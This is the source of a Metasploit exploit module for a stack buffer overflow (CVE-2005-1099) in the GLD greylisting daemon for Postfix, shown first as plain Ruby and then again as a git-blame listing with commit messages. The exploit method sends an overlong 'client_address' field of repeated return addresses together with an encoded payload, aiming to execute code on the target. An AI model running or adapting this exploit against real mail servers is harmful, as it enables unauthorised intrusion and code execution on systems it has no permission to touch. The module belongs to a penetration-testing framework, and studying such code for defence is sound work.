metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


  class Metasploit < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'	=> %q{
        This module exploits a stack buffer overflow in the Salim Gasmi
        GLD <= 1.4 greylisting daemon for Postfix. By sending an
        overly long string the stack can be overwritten.
      },
      'Author'	=> [ 'patrick' ],
      'Arch'		=> ARCH_X86,
      'Platform'	=> 'linux',
      'References'	=>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'EDB', '934' ]
        ],
      'Privileged'	=> true,
      'License'	=> MSF_LICENSE,
      'Payload'	=>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      'Targets'	=>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'	=> 0,
      'DisclosureDate'  => 'Apr 12 2005'
    ))

    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  def exploit
    connect

    sploit = "sender="+ payload.encoded + "\r\n"
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)
    handler
    disconnect

  end

end
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00			`##`


			`require 'msf/core'`


change Metasploit3 class names 2016-03-07 08:56:58 +00:00			`class Metasploit < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GoodRanking`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the Salim Gasmi`
			`GLD <= 1.4 greylisting daemon for Postfix. By sending an`
			`overly long string the stack can be overwritten.`
			`},`
			`'Author' => [ 'patrick' ],`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux',`
			`'References' =>`
			`[`
			`[ 'CVE', '2005-1099' ],`
			`[ 'OSVDB', '15492' ],`
			`[ 'BID', '13129' ],`
			`[ 'EDB', '934' ]`
			`],`
			`'Privileged' => true,`
			`'License' => MSF_LICENSE,`
			`'Payload' =>`
			`{`
			`'Space' => 1000,`
			`'BadChars' => "\x00\x0a\x0d\x20=",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Targets' =>`
			`[`
			`[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Apr 12 2005'`
			`))`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(2525)`
			`],`
			`self.class`
			`)`
			`end`
ensure binary mode when opening files, whitespace fixes git-svn-id: file:///home/svn/framework3/trunk@9653 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-01 23:33:07 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = "sender="+ payload.encoded + "\r\n"`
			`sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.put(sploit)`
			`handler`
			`disconnect`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Added gld_postfix.rb module git-svn-id: file:///home/svn/framework3/trunk@5528 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-07 02:16:34 +00:00
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`